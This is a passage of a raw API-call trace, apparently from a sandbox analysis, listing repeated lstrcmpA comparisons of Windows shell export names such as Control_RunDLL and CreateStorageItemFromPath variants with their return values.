lpString2="AppCompat_RunDLLW") returned 1 [0145.650] lstrcmpA (lpString1="AssocCreateForClasses", lpString2="AssocCreateForClasses") returned 0 [0145.651] lstrcmpA (lpString1="AssocGetDetailsOfPropKey", lpString2="AppCompat_RunDLLW") returned 1 [0145.651] lstrcmpA (lpString1="AssocGetDetailsOfPropKey", lpString2="AssocCreateForClasses") returned 1 [0145.651] lstrcmpA (lpString1="AssocGetDetailsOfPropKey", lpString2="AssocGetDetailsOfPropKey") returned 0 [0145.651] lstrcmpA (lpString1="CDefFolderMenu_Create2", lpString2="AppCompat_RunDLLW") returned 1 [0145.651] lstrcmpA (lpString1="CDefFolderMenu_Create2", lpString2="AssocCreateForClasses") returned 1 [0145.651] lstrcmpA (lpString1="CDefFolderMenu_Create2", lpString2="AssocGetDetailsOfPropKey") returned 1 [0145.651] lstrcmpA (lpString1="CDefFolderMenu_Create2", lpString2="CDefFolderMenu_Create2") returned 0 [0145.651] lstrcmpA (lpString1="CIDLData_CreateFromIDArray", lpString2="AppCompat_RunDLLW") returned 1 [0145.651] lstrcmpA (lpString1="CIDLData_CreateFromIDArray", lpString2="AssocCreateForClasses") returned 1 [0145.651] lstrcmpA (lpString1="CIDLData_CreateFromIDArray", lpString2="AssocGetDetailsOfPropKey") returned 1 [0145.651] lstrcmpA (lpString1="CIDLData_CreateFromIDArray", lpString2="CDefFolderMenu_Create2") returned 1 [0145.651] lstrcmpA (lpString1="CIDLData_CreateFromIDArray", lpString2="CIDLData_CreateFromIDArray") returned 0 [0145.651] lstrcmpA (lpString1="CStorageItem_GetValidatedStorageItemObject", lpString2="AppCompat_RunDLLW") returned 1 [0145.651] lstrcmpA (lpString1="CStorageItem_GetValidatedStorageItemObject", lpString2="AssocCreateForClasses") returned 1 [0145.651] lstrcmpA (lpString1="CStorageItem_GetValidatedStorageItemObject", lpString2="AssocGetDetailsOfPropKey") returned 1 [0145.651] lstrcmpA (lpString1="CStorageItem_GetValidatedStorageItemObject", lpString2="CDefFolderMenu_Create2") returned 1 [0145.651] lstrcmpA (lpString1="CStorageItem_GetValidatedStorageItemObject", lpString2="CIDLData_CreateFromIDArray") returned 1 [0145.651] lstrcmpA (lpString1="CStorageItem_GetValidatedStorageItemObject", lpString2="CStorageItem_GetValidatedStorageItemObject") returned 0 [0145.651] lstrcmpA (lpString1="CheckEscapesW", lpString2="AppCompat_RunDLLW") returned 1 [0145.652] lstrcmpA (lpString1="CheckEscapesW", lpString2="AssocCreateForClasses") returned 1 [0145.652] lstrcmpA (lpString1="CheckEscapesW", lpString2="AssocGetDetailsOfPropKey") returned 1 [0145.652] lstrcmpA (lpString1="CheckEscapesW", lpString2="CDefFolderMenu_Create2") returned 1 [0145.652] lstrcmpA (lpString1="CheckEscapesW", lpString2="CIDLData_CreateFromIDArray") returned -1 [0145.652] lstrcmpA (lpString1="CheckEscapesW", lpString2="CStorageItem_GetValidatedStorageItemObject") returned -1 [0145.652] lstrcmpA (lpString1="CheckEscapesW", lpString2="CheckEscapesW") returned 0 [0145.652] lstrcmpA (lpString1="CommandLineToArgvW", lpString2="AppCompat_RunDLLW") returned 1 [0145.652] lstrcmpA (lpString1="CommandLineToArgvW", lpString2="AssocCreateForClasses") returned 1 [0145.652] lstrcmpA (lpString1="CommandLineToArgvW", lpString2="AssocGetDetailsOfPropKey") returned 1 [0145.652] lstrcmpA (lpString1="CommandLineToArgvW", lpString2="CDefFolderMenu_Create2") returned 1 [0145.652] lstrcmpA (lpString1="CommandLineToArgvW", lpString2="CIDLData_CreateFromIDArray") returned 1 [0145.652] lstrcmpA (lpString1="CommandLineToArgvW", lpString2="CStorageItem_GetValidatedStorageItemObject") returned -1 [0145.652] lstrcmpA (lpString1="CommandLineToArgvW", lpString2="CheckEscapesW") returned 1 [0145.652] lstrcmpA (lpString1="CommandLineToArgvW", lpString2="CommandLineToArgvW") returned 0 [0145.652] lstrcmpA (lpString1="Control_RunDLL", lpString2="AppCompat_RunDLLW") returned 1 [0145.652] lstrcmpA (lpString1="Control_RunDLL", lpString2="AssocCreateForClasses") returned 1 [0145.652] lstrcmpA (lpString1="Control_RunDLL", lpString2="AssocGetDetailsOfPropKey") returned 1 [0145.652] lstrcmpA (lpString1="Control_RunDLL", lpString2="CDefFolderMenu_Create2") returned 1 [0145.652] lstrcmpA (lpString1="Control_RunDLL", lpString2="CIDLData_CreateFromIDArray") returned 1 [0145.652] lstrcmpA (lpString1="Control_RunDLL", lpString2="CStorageItem_GetValidatedStorageItemObject") returned -1 [0145.652] lstrcmpA (lpString1="Control_RunDLL", lpString2="CheckEscapesW") returned 1 [0145.652] lstrcmpA (lpString1="Control_RunDLL", lpString2="CommandLineToArgvW") returned 1 [0145.652] lstrcmpA (lpString1="Control_RunDLL", lpString2="Control_RunDLL") returned 0 [0145.653] lstrcmpA (lpString1="Control_RunDLLA", lpString2="AppCompat_RunDLLW") returned 1 [0145.653] lstrcmpA (lpString1="Control_RunDLLA", lpString2="AssocCreateForClasses") returned 1 [0145.653] lstrcmpA (lpString1="Control_RunDLLA", lpString2="AssocGetDetailsOfPropKey") returned 1 [0145.653] lstrcmpA (lpString1="Control_RunDLLA", lpString2="CDefFolderMenu_Create2") returned 1 [0145.653] lstrcmpA (lpString1="Control_RunDLLA", lpString2="CIDLData_CreateFromIDArray") returned 1 [0145.653] lstrcmpA (lpString1="Control_RunDLLA", lpString2="CStorageItem_GetValidatedStorageItemObject") returned -1 [0145.653] lstrcmpA (lpString1="Control_RunDLLA", lpString2="CheckEscapesW") returned 1 [0145.653] lstrcmpA (lpString1="Control_RunDLLA", lpString2="CommandLineToArgvW") returned 1 [0145.653] lstrcmpA (lpString1="Control_RunDLLA", lpString2="Control_RunDLL") returned 1 [0145.653] lstrcmpA (lpString1="Control_RunDLLA", lpString2="Control_RunDLLA") returned 0 [0145.653] lstrcmpA (lpString1="Control_RunDLLAsUserW", lpString2="AppCompat_RunDLLW") returned 1 [0145.653] lstrcmpA (lpString1="Control_RunDLLAsUserW", lpString2="AssocCreateForClasses") returned 1 [0145.653] lstrcmpA (lpString1="Control_RunDLLAsUserW", lpString2="AssocGetDetailsOfPropKey") returned 1 [0145.653] lstrcmpA (lpString1="Control_RunDLLAsUserW", lpString2="CDefFolderMenu_Create2") returned 1 [0145.653] lstrcmpA (lpString1="Control_RunDLLAsUserW", lpString2="CIDLData_CreateFromIDArray") returned 1 [0145.653] lstrcmpA (lpString1="Control_RunDLLAsUserW", lpString2="CStorageItem_GetValidatedStorageItemObject") returned -1 [0145.653] lstrcmpA (lpString1="Control_RunDLLAsUserW", lpString2="CheckEscapesW") returned 1 [0145.653] lstrcmpA (lpString1="Control_RunDLLAsUserW", lpString2="CommandLineToArgvW") returned 1 [0145.653] lstrcmpA (lpString1="Control_RunDLLAsUserW", lpString2="Control_RunDLL") returned 1 [0145.653] lstrcmpA (lpString1="Control_RunDLLAsUserW", lpString2="Control_RunDLLA") returned 1 [0145.653] lstrcmpA (lpString1="Control_RunDLLAsUserW", lpString2="Control_RunDLLAsUserW") returned 0 [0145.653] lstrcmpA (lpString1="Control_RunDLLW", lpString2="AppCompat_RunDLLW") returned 1 [0145.653] lstrcmpA (lpString1="Control_RunDLLW", lpString2="AssocCreateForClasses") returned 1 [0145.653] lstrcmpA (lpString1="Control_RunDLLW", lpString2="AssocGetDetailsOfPropKey") returned 1 [0145.653] lstrcmpA (lpString1="Control_RunDLLW", lpString2="CDefFolderMenu_Create2") returned 1 [0145.653] lstrcmpA (lpString1="Control_RunDLLW", lpString2="CIDLData_CreateFromIDArray") returned 1 [0145.653] lstrcmpA (lpString1="Control_RunDLLW", lpString2="CStorageItem_GetValidatedStorageItemObject") returned -1 [0145.653] lstrcmpA (lpString1="Control_RunDLLW", lpString2="CheckEscapesW") returned 1 [0145.653] lstrcmpA (lpString1="Control_RunDLLW", lpString2="CommandLineToArgvW") returned 1 [0145.653] lstrcmpA (lpString1="Control_RunDLLW", lpString2="Control_RunDLL") returned 1 [0145.654] lstrcmpA (lpString1="Control_RunDLLW", lpString2="Control_RunDLLA") returned 1 [0145.654] lstrcmpA (lpString1="Control_RunDLLW", lpString2="Control_RunDLLAsUserW") returned 1 [0145.654] lstrcmpA (lpString1="Control_RunDLLW", lpString2="Control_RunDLLW") returned 0 [0145.654] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller", lpString2="AppCompat_RunDLLW") returned 1 [0145.654] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller", lpString2="AssocCreateForClasses") returned 1 [0145.654] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller", lpString2="AssocGetDetailsOfPropKey") returned 1 [0145.654] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller", lpString2="CDefFolderMenu_Create2") returned 1 [0145.654] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller", lpString2="CIDLData_CreateFromIDArray") returned 1 [0145.654] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller", lpString2="CStorageItem_GetValidatedStorageItemObject") returned -1 [0145.654] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller", lpString2="CheckEscapesW") returned 1 [0145.654] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller", lpString2="CommandLineToArgvW") returned 1 [0145.654] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller", lpString2="Control_RunDLL") returned 1 [0145.654] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller", lpString2="Control_RunDLLA") returned 1 [0145.654] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller", lpString2="Control_RunDLLAsUserW") returned 1 [0145.654] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller", lpString2="Control_RunDLLW") returned 1 [0145.654] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller", lpString2="CreateStorageItemFromPath_FullTrustCaller") returned 0 [0145.654] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller_ForPackage", lpString2="AppCompat_RunDLLW") returned 1 [0145.654] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller_ForPackage", lpString2="AssocCreateForClasses") returned 1 [0145.654] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller_ForPackage", lpString2="AssocGetDetailsOfPropKey") returned 1 [0145.654] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller_ForPackage", lpString2="CDefFolderMenu_Create2") returned 1 [0145.654] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller_ForPackage", lpString2="CIDLData_CreateFromIDArray") returned 1 [0145.654] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller_ForPackage", lpString2="CStorageItem_GetValidatedStorageItemObject") returned -1 [0145.654] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller_ForPackage", lpString2="CheckEscapesW") returned 1 [0145.654] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller_ForPackage", lpString2="CommandLineToArgvW") returned 1 [0145.654] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller_ForPackage", lpString2="Control_RunDLL") returned 1 [0145.654] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller_ForPackage", lpString2="Control_RunDLLA") returned 1 [0145.655] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller_ForPackage", lpString2="Control_RunDLLAsUserW") returned 1 [0145.655] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller_ForPackage", lpString2="Control_RunDLLW") returned 1 [0145.655] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller_ForPackage", lpString2="CreateStorageItemFromPath_FullTrustCaller") returned 1 [0145.655] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller_ForPackage", lpString2="CreateStorageItemFromPath_FullTrustCaller_ForPackage") returned 0 [0145.655] lstrcmpA (lpString1="CreateStorageItemFromPath_PartialTrustCaller", lpString2="AppCompat_RunDLLW") returned 1 [0145.655] lstrcmpA (lpString1="CreateStorageItemFromPath_PartialTrustCaller", lpString2="AssocCreateForClasses") returned 1 [0145.655] lstrcmpA (lpString1="CreateStorageItemFromPath_PartialTrustCaller", lpString2="AssocGetDetailsOfPropKey") returned 1 [0145.655] lstrcmpA (lpString1="CreateStorageItemFromPath_PartialTrustCaller", lpString2="CDefFolderMenu_Create2") returned 1 [0145.655] lstrcmpA (lpString1="CreateStorageItemFromPath_PartialTrustCaller", lpString2="CIDLData_CreateFromIDArray") returned 1 [0145.655] lstrcmpA (lpString1="CreateStorageItemFromPath_PartialTrustCaller", lpString2="CStorageItem_GetValidatedStorageItemObject") returned -1 [0145.655] lstrcmpA (lpString1="CreateStorageItemFromPath_PartialTrustCaller", lpString2="CheckEscapesW") returned 1 [0145.655] lstrcmpA (lpString1="CreateStorageItemFromPath_PartialTrustCaller", lpString2="CommandLineToArgvW") returned 1 [0145.655] lstrcmpA (lpString1="CreateStorageItemFromPath_PartialTrustCaller", lpString2="Control_RunDLL") returned 1 [0145.655] lstrcmpA (lpString1="CreateStorageItemFromPath_PartialTrustCaller", lpString2="Control_RunDLLA") returned 1 [0145.655] lstrcmpA (lpString1="CreateStorageItemFromPath_PartialTrustCaller", lpString2="Control_RunDLLAsUserW") returned 1 [0145.655] lstrcmpA (lpString1="CreateStorageItemFromPath_PartialTrustCaller", lpString2="Control_RunDLLW") returned 1 [0145.655] lstrcmpA (lpString1="CreateStorageItemFromPath_PartialTrustCaller", lpString2="CreateStorageItemFromPath_FullTrustCaller") returned 1 [0145.655] lstrcmpA (lpString1="CreateStorageItemFromPath_PartialTrustCaller", lpString2="CreateStorageItemFromPath_FullTrustCaller_ForPackage") returned 1 [0145.655] lstrcmpA (lpString1="CreateStorageItemFromPath_PartialTrustCaller", lpString2="CreateStorageItemFromPath_PartialTrustCaller") returned 0 [0145.655] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller", lpString2="AppCompat_RunDLLW") returned 1 [0145.655] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller", lpString2="AssocCreateForClasses") returned 1 [0145.655] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller", lpString2="AssocGetDetailsOfPropKey") returned 1 [0145.655] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller", lpString2="CDefFolderMenu_Create2") returned 1 [0145.655] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller", lpString2="CIDLData_CreateFromIDArray") returned 1 [0145.656] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller", lpString2="CStorageItem_GetValidatedStorageItemObject") returned -1 [0145.656] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller", lpString2="CheckEscapesW") returned 1 [0145.656] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller", lpString2="CommandLineToArgvW") returned 1 [0145.656] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller", lpString2="Control_RunDLL") returned 1 [0145.656] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller", lpString2="Control_RunDLLA") returned 1 [0145.656] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller", lpString2="Control_RunDLLAsUserW") returned 1 [0145.656] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller", lpString2="Control_RunDLLW") returned 1 [0145.656] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller", lpString2="CreateStorageItemFromPath_FullTrustCaller") returned 1 [0145.656] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller", lpString2="CreateStorageItemFromPath_FullTrustCaller_ForPackage") returned 1 [0145.656] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller", lpString2="CreateStorageItemFromPath_PartialTrustCaller") returned 1 [0145.656] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller", lpString2="CreateStorageItemFromShellItem_FullTrustCaller") returned 0 [0145.656] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage", lpString2="AppCompat_RunDLLW") returned 1 [0145.656] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage", lpString2="AssocCreateForClasses") returned 1 [0145.656] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage", lpString2="AssocGetDetailsOfPropKey") returned 1 [0145.656] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage", lpString2="CDefFolderMenu_Create2") returned 1 [0145.656] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage", lpString2="CIDLData_CreateFromIDArray") returned 1 [0145.656] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage", lpString2="CStorageItem_GetValidatedStorageItemObject") returned -1 [0145.656] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage", lpString2="CheckEscapesW") returned 1 [0145.656] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage", lpString2="CommandLineToArgvW") returned 1 [0145.656] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage", lpString2="Control_RunDLL") returned 1 [0145.656] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage", lpString2="Control_RunDLLA") returned 1 [0145.656] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage", lpString2="Control_RunDLLAsUserW") returned 1 [0145.656] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage", lpString2="Control_RunDLLW") returned 1 [0145.657] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage", lpString2="CreateStorageItemFromPath_FullTrustCaller") returned 1 [0145.657] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage", lpString2="CreateStorageItemFromPath_FullTrustCaller_ForPackage") returned 1 [0145.657] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage", lpString2="CreateStorageItemFromPath_PartialTrustCaller") returned 1 [0145.657] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage", lpString2="CreateStorageItemFromShellItem_FullTrustCaller") returned 1 [0145.657] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage", lpString2="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage") returned 0 [0145.657] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage_WithProcessHandle", lpString2="AppCompat_RunDLLW") returned 1 [0145.657] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage_WithProcessHandle", lpString2="AssocCreateForClasses") returned 1 [0145.657] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage_WithProcessHandle", lpString2="AssocGetDetailsOfPropKey") returned 1 [0145.657] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage_WithProcessHandle", lpString2="CDefFolderMenu_Create2") returned 1 [0145.657] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage_WithProcessHandle", lpString2="CIDLData_CreateFromIDArray") returned 1 [0145.657] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage_WithProcessHandle", lpString2="CStorageItem_GetValidatedStorageItemObject") returned -1 [0145.657] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage_WithProcessHandle", lpString2="CheckEscapesW") returned 1 [0145.657] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage_WithProcessHandle", lpString2="CommandLineToArgvW") returned 1 [0145.657] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage_WithProcessHandle", lpString2="Control_RunDLL") returned 1 [0145.657] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage_WithProcessHandle", lpString2="Control_RunDLLA") returned 1 [0145.657] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage_WithProcessHandle", lpString2="Control_RunDLLAsUserW") returned 1 [0145.657] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage_WithProcessHandle", lpString2="Control_RunDLLW") returned 1 [0145.657] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage_WithProcessHandle", lpString2="CreateStorageItemFromPath_FullTrustCaller") returned 1 [0145.657] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage_WithProcessHandle", lpString2="CreateStorageItemFromPath_FullTrustCaller_ForPackage") returned 1 [0145.657] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage_WithProcessHandle", lpString2="CreateStorageItemFromPath_PartialTrustCaller") returned 1 [0145.657] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage_WithProcessHandle", lpString2="CreateStorageItemFromShellItem_FullTrustCaller") returned 1 [0145.657] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage_WithProcessHandle", lpString2="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage") returned 1 [0145.658] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage_WithProcessHandle", lpString2="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage_WithProcessHandle") returned 0 [0145.658] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_UseImplicitFlagsAndPackage", lpString2="AppCompat_RunDLLW") returned 1 [0145.658] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_UseImplicitFlagsAndPackage", lpString2="AssocCreateForClasses") returned 1 [0145.658] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_UseImplicitFlagsAndPackage", lpString2="AssocGetDetailsOfPropKey") returned 1 [0145.658] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_UseImplicitFlagsAndPackage", lpString2="CDefFolderMenu_Create2") returned 1 [0145.658] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_UseImplicitFlagsAndPackage", lpString2="CIDLData_CreateFromIDArray") returned 1 [0145.658] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_UseImplicitFlagsAndPackage", lpString2="CStorageItem_GetValidatedStorageItemObject") returned -1 [0145.658] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_UseImplicitFlagsAndPackage", lpString2="CheckEscapesW") returned 1 [0145.658] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_UseImplicitFlagsAndPackage", lpString2="CommandLineToArgvW") returned 1 [0145.658] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_UseImplicitFlagsAndPackage", lpString2="Control_RunDLL") returned 1 [0145.658] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_UseImplicitFlagsAndPackage", lpString2="Control_RunDLLA") returned 1 [0145.658] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_UseImplicitFlagsAndPackage", lpString2="Control_RunDLLAsUserW") returned 1 [0145.658] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_UseImplicitFlagsAndPackage", lpString2="Control_RunDLLW") returned 1 [0145.658] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_UseImplicitFlagsAndPackage", lpString2="CreateStorageItemFromPath_FullTrustCaller") returned 1 [0145.658] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_UseImplicitFlagsAndPackage", lpString2="CreateStorageItemFromPath_FullTrustCaller_ForPackage") returned 1 [0145.658] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_UseImplicitFlagsAndPackage", lpString2="CreateStorageItemFromPath_PartialTrustCaller") returned 1 [0145.658] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_UseImplicitFlagsAndPackage", lpString2="CreateStorageItemFromShellItem_FullTrustCaller") returned 1 [0145.658] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_UseImplicitFlagsAndPackage", lpString2="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage") returned 1 [0145.658] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_UseImplicitFlagsAndPackage", lpString2="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage_WithProcessHandle") returned 1 [0145.658] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_UseImplicitFlagsAndPackage", lpString2="CreateStorageItemFromShellItem_FullTrustCaller_UseImplicitFlagsAndPackage") returned 0 [0145.658] lstrcmpA (lpString1="DAD_AutoScroll", lpString2="AppCompat_RunDLLW") returned 1 [0145.658] lstrcmpA (lpString1="DAD_AutoScroll", lpString2="AssocCreateForClasses") returned 1 [0145.658] lstrcmpA (lpString1="DAD_AutoScroll", lpString2="AssocGetDetailsOfPropKey") returned 1 [0145.658] lstrcmpA (lpString1="DAD_AutoScroll", lpString2="CDefFolderMenu_Create2") returned 1 [0145.658] lstrcmpA (lpString1="DAD_AutoScroll", lpString2="CIDLData_CreateFromIDArray") returned 1 [0145.658] lstrcmpA (lpString1="DAD_AutoScroll", lpString2="CStorageItem_GetValidatedStorageItemObject") returned 1 [0145.658] lstrcmpA (lpString1="DAD_AutoScroll", lpString2="CheckEscapesW") returned 1 [0145.658] lstrcmpA (lpString1="DAD_AutoScroll", lpString2="CommandLineToArgvW") returned 1 [0145.658] lstrcmpA (lpString1="DAD_AutoScroll", lpString2="Control_RunDLL") returned 1 [0145.658] lstrcmpA (lpString1="DAD_AutoScroll", lpString2="Control_RunDLLA") returned 1 [0145.659] lstrcmpA (lpString1="DAD_AutoScroll", lpString2="Control_RunDLLAsUserW") returned 1 [0145.669] lstrcmpA (lpString1="DAD_AutoScroll", lpString2="Control_RunDLLW") returned 1 [0145.669] lstrcmpA (lpString1="DAD_AutoScroll", lpString2="CreateStorageItemFromPath_FullTrustCaller") returned 1 [0145.669] lstrcmpA (lpString1="DAD_AutoScroll", lpString2="CreateStorageItemFromPath_FullTrustCaller_ForPackage") returned 1 [0145.669] lstrcmpA (lpString1="DAD_AutoScroll", lpString2="CreateStorageItemFromPath_PartialTrustCaller") returned 1 [0145.669] lstrcmpA (lpString1="DAD_AutoScroll", lpString2="CreateStorageItemFromShellItem_FullTrustCaller") returned 1 [0145.669] lstrcmpA (lpString1="DAD_AutoScroll", lpString2="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage") returned 1 [0145.669] lstrcmpA (lpString1="DAD_AutoScroll", lpString2="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage_WithProcessHandle") returned 1 [0145.669] lstrcmpA (lpString1="DAD_AutoScroll", lpString2="CreateStorageItemFromShellItem_FullTrustCaller_UseImplicitFlagsAndPackage") returned 1 [0145.669] lstrcmpA (lpString1="DAD_AutoScroll", lpString2="DAD_AutoScroll") returned 0 [0145.669] lstrcmpA (lpString1="DAD_DragEnterEx", lpString2="AppCompat_RunDLLW") returned 1 [0145.669] lstrcmpA (lpString1="DAD_DragEnterEx", lpString2="AssocCreateForClasses") returned 1 [0145.669] lstrcmpA (lpString1="DAD_DragEnterEx", lpString2="AssocGetDetailsOfPropKey") returned 1 [0145.669] lstrcmpA (lpString1="DAD_DragEnterEx", lpString2="CDefFolderMenu_Create2") returned 1 [0145.669] lstrcmpA (lpString1="DAD_DragEnterEx", lpString2="CIDLData_CreateFromIDArray") returned 1 [0145.669] lstrcmpA (lpString1="DAD_DragEnterEx", lpString2="CStorageItem_GetValidatedStorageItemObject") returned 1 [0145.669] lstrcmpA (lpString1="DAD_DragEnterEx", lpString2="CheckEscapesW") returned 1 [0145.669] lstrcmpA (lpString1="DAD_DragEnterEx", lpString2="CommandLineToArgvW") returned 1 [0145.669] lstrcmpA (lpString1="DAD_DragEnterEx", lpString2="Control_RunDLL") returned 1 [0145.670] lstrcmpA (lpString1="DAD_DragEnterEx", lpString2="Control_RunDLLA") returned 1 [0145.670] lstrcmpA (lpString1="DAD_DragEnterEx", lpString2="Control_RunDLLAsUserW") returned 1 [0145.670] lstrcmpA (lpString1="DAD_DragEnterEx", lpString2="Control_RunDLLW") returned 1 [0145.670] lstrcmpA (lpString1="DAD_DragEnterEx", lpString2="CreateStorageItemFromPath_FullTrustCaller") returned 1 [0145.670] lstrcmpA (lpString1="DAD_DragEnterEx", lpString2="CreateStorageItemFromPath_FullTrustCaller_ForPackage") returned 1 [0145.670] lstrcmpA (lpString1="DAD_DragEnterEx", lpString2="CreateStorageItemFromPath_PartialTrustCaller") returned 1 [0145.670] lstrcmpA (lpString1="DAD_DragEnterEx", lpString2="CreateStorageItemFromShellItem_FullTrustCaller") returned 1 [0145.670] lstrcmpA (lpString1="DAD_DragEnterEx", lpString2="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage") returned 1 [0145.670] lstrcmpA (lpString1="DAD_DragEnterEx", lpString2="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage_WithProcessHandle") returned 1 [0145.670] lstrcmpA (lpString1="DAD_DragEnterEx", lpString2="CreateStorageItemFromShellItem_FullTrustCaller_UseImplicitFlagsAndPackage") returned 1 [0145.670] lstrcmpA (lpString1="DAD_DragEnterEx", lpString2="DAD_AutoScroll") returned 1 [0145.670] 